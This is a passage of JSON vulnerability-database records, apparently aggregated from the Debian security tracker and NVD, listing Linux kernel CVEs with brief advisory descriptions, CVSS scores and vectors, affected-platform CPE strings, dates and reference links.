"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2069"], "modified": "2016-04-27T17:59:00", "id": 
"DEBIANCVE:CVE-2016-2069", "href": "https://security-tracker.debian.org/tracker/CVE-2016-2069", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-01T06:10:38", "description": "drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel before 4.5 does not properly identify error conditions, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-27T17:59:00", "type": "debiancve", "title": "CVE-2015-8812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8812"], "modified": "2016-04-27T17:59:00", "id": "DEBIANCVE:CVE-2015-8812", "href": "https://security-tracker.debian.org/tracker/CVE-2015-8812", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T14:36:03", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and 
use-after-free) via crafted keyctl commands.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-08T03:59:00", "type": "debiancve", "title": "CVE-2016-0728", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2016-02-08T03:59:00", "id": "DEBIANCVE:CVE-2016-0728", "href": "https://security-tracker.debian.org/tracker/CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:38:47", "description": "Multiple stack-based buffer overflows in the magicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the Magic Mouse HID driver in the Linux kernel through 3.16.3 allow physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted device that provides a large amount of (1) EHCI or (2) XHCI data associated with an event.", "cvss3": {}, "published": "2014-09-28T10:55:00", "type": "debiancve", "title": "CVE-2014-3181", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3181"], "modified": "2014-09-28T10:55:00", "id": "DEBIANCVE:CVE-2014-3181", "href": "https://security-tracker.debian.org/tracker/CVE-2014-3181", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T10:10:50", "description": "The security_context_to_sid_core function in security/selinux/ss/services.c in the Linux kernel before 3.13.4 allows local users to cause a denial of service (system crash) by leveraging the CAP_MAC_ADMIN capability to set a zero-length security context.", "cvss3": {}, "published": "2014-02-28T06:18:00", "type": "debiancve", "title": "CVE-2014-1874", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1874"], "modified": "2014-02-28T06:18:00", "id": "DEBIANCVE:CVE-2014-1874", "href": "https://security-tracker.debian.org/tracker/CVE-2014-1874", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-31T18:11:35", "description": "The Linux kernel before 3.12, when UDP Fragmentation Offload (UFO) is enabled, does not properly initialize certain data structures, which allows local users to cause a denial of service (memory 
corruption and system crash) or possibly gain privileges via a crafted application that uses the UDP_CORK option in a setsockopt system call and sends both short and long packets, related to the ip_ufo_append_data function in net/ipv4/ip_output.c and the ip6_ufo_append_data function in net/ipv6/ip6_output.c.", "cvss3": {}, "published": "2013-11-04T15:55:00", "type": "debiancve", "title": "CVE-2013-4470", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4470"], "modified": "2013-11-04T15:55:00", "id": "DEBIANCVE:CVE-2013-4470", "href": "https://security-tracker.debian.org/tracker/CVE-2013-4470", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T10:10:50", "description": "Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.", "cvss3": {}, "published": "2014-03-24T16:40:00", "type": "debiancve", "title": "CVE-2014-0131", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", 
"authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2014-03-24T16:40:00", "id": "DEBIANCVE:CVE-2014-0131", "href": "https://security-tracker.debian.org/tracker/CVE-2014-0131", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-05-31T14:08:27", "description": "A missing authorization check in the fscrypt_process_policy function in fs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in the Linux kernel before 4.7.4 allows a user to assign an encryption policy to a directory owned by a different user, potentially creating a denial of service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-04T16:59:00", "type": "cve", "title": "CVE-2016-10318", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2017-04-11T15:32:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7.3"], "id": "CVE-2016-10318", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10318", "cvss": {"score": 4.0, "vector": 
"AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:28:52", "description": "The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c in the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not validate a certain id value, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that makes a crafted ioctl call.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-08-07T21:59:00", "type": "cve", "title": "CVE-2014-9410", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9410"], "modified": "2020-11-17T14:15:00", "cpe": ["cpe:/o:linux:linux_kernel:3.19.8"], "id": "CVE-2014-9410", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9410", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.19.8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:30:14", "description": "The 
regulator_ena_gpio_free function in drivers/regulator/core.c in the Linux kernel before 3.19 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-02T21:59:00", "type": "cve", "title": "CVE-2014-9940", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9940"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.52", "cpe:/o:google:android:7.1.1"], "id": "CVE-2014-9940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9940", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.52:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:7.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T02:16:26", "description": "Out-of-bounds memory read in the x509_decode_time function in x509_cert_parser.c in Linux kernels 4.3-rc1 and after.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-25T21:29:00", "type": "cve", "title": "CVE-2015-5327", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5327"], "modified": "2019-03-07T15:02:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3"], "id": "CVE-2015-5327", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5327", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.3:rc3:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:22:22", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impact via crafted use of the mmap and bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T10:59:00", "type": "cve", "title": "CVE-2016-4794", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2023-02-16T02:32:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "CVE-2016-4794", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-06-01T10:28:54", "description": "The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. 
implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.", "cvss3": {}, "published": "2015-01-02T21:59:00", "type": "cve", "title": "CVE-2014-9428", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9428"], "modified": "2023-01-20T03:02:00", "cpe": [], "id": "CVE-2014-9428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9428", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": []}, {"lastseen": "2023-06-01T10:25:55", "description": "The paravirt_ops_setup function in arch/x86/kernel/kvm.c in the Linux kernel through 3.18 uses an improper paravirt_enabled setting for KVM guest kernels, which makes it easier for guest OS users to bypass the ASLR protection mechanism via a crafted application that reads a 16-bit value.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2014-12-12T18:59:00", "type": "cve", "title": "CVE-2014-8134", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": 
{"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8134"], "modified": "2023-02-13T00:43:00", "cpe": ["cpe:/o:suse:suse_linux_enterprise_server:11", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:oracle:linux:6", "cpe:/o:linux:linux_kernel:3.18", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:opensuse:evergreen:11.4"], "id": "CVE-2014-8134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8134", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:opensuse:evergreen:11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}, {"lastseen": "2023-05-31T14:52:30", "description": "The dm_get_from_kobject function in drivers/md/dm.c in the Linux kernel before 4.14.3 allows local users to cause a denial of service (BUG) by leveraging a race condition with __dm_destroy during creation and removal of DM devices.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", 
"privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-02-27T20:29:00", "type": "cve", "title": "CVE-2017-18203", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18203"], "modified": "2018-06-20T01:29:00", "cpe": [], "id": "CVE-2017-18203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18203", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-05-31T14:35:35", "description": "The keyctl_read_key function in security/keys/keyctl.c in the Key Management subcomponent in the Linux kernel before 4.13.5 does not properly consider that a key may be possessed but negatively instantiated, which allows local users to cause a denial of service (OOPS and system crash) via a crafted KEYCTL_READ operation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-12T00:29:00", "type": "cve", "title": "CVE-2017-12192", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 
3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12192"], "modified": "2023-02-12T23:28:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.4"], "id": "CVE-2017-12192", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12192", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-31T14:52:59", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). 
This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-07-26T19:29:00", "type": "cve", "title": "CVE-2017-18344", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18344"], "modified": "2020-10-15T13:28:00", "cpe": ["cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_tus:7.2", "cpe:/a:redhat:mrg_realtime:2.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5"], "id": "CVE-2017-18344", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18344", 
"cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:mrg_realtime:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*"]}, {"lastseen": "2023-06-01T02:16:22", "description": "The (1) udp_recvmsg and (2) udpv6_recvmsg functions in the Linux kernel before 